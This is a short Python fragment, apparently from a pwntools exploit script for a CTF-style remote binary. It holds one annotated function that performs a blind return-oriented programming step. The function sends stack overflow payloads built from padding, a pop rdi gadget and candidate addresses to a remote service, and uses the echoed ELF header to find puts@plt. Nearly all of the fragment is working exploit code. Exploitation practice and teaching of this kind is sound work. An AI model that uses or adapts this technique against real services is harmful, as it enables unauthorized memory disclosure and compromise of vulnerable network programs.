...
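def find_puts_addr(size, stop_gadget, rdi_ret):
    """Blindly locate puts@plt by probing every address in ``base + 1 .. base + 0xfff``.

    Classic BROP step: for each candidate ``addr`` a chain of
    ``pop rdi; ret`` / 0x400000 / ``addr`` / ``stop_gadget`` is sent after
    ``size`` bytes of padding.  If ``addr`` really is puts@plt the target
    prints the bytes at 0x400000 (the ELF header of a non-PIE x86-64 binary)
    back to us, which is recognised by the ``\\x7fELF`` magic.

    Args:
        size: padding length up to the saved return address.
        stop_gadget: address that keeps the process alive after the call returns.
        rdi_ret: address of a ``pop rdi; ret`` gadget.

    Returns:
        The address of puts@plt, or ``None`` if no candidate echoed an ELF header.

    Raises:
        Whatever ``remote``/``recvuntil``/``sendline`` raise when the service
        itself is unreachable; only the post-payload ``recv`` is treated as a
        per-candidate failure.

    Depends on module-level ``base``, ``ip``, ``port`` and on pwntools'
    ``remote``, ``p64`` and ``log`` (assumed to be imported by the script).
    """
    progress = log.progress("Searching for the address of puts@plt")
    # NOTE(review): x86-64 PLT stubs are 16-byte aligned, so a step of 16 would
    # cut the scan 16x; the per-byte step is kept to preserve original behaviour.
    for offset in range(1, 0x1000):
        addr = int(base + offset)
        # pop rdi <- 0x400000 ; call candidate ; land on stop gadget so a hit
        # does not crash before the output reaches us.
        payload = 'A' * size + p64(rdi_ret)
        payload += p64(0x400000)
        payload += p64(addr)
        payload += p64(stop_gadget)
        if offset % 0x100 == 0:
            progress.status("currently at 0x%x" % offset)
        r = remote(ip, port, level='error')
        try:
            r.recvuntil('WelCome my friend,Do you know password?\n')
            r.sendline(payload)
            try:
                response = r.recv()
            except Exception:
                # Best-effort probe: a non-callable candidate usually kills the
                # process and the read fails (EOF etc.); move on to the next one.
                continue
        finally:
            # Close on every path, including the successful return below.
            r.close()
        if response.startswith('\x7fELF'):
            progress.success('find puts@plt addr: 0x%x' % addr)
            log.info('find puts@plt addr: 0x%x' % addr)
            return addr
    progress.failure('puts@plt not found in range')
    return None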
...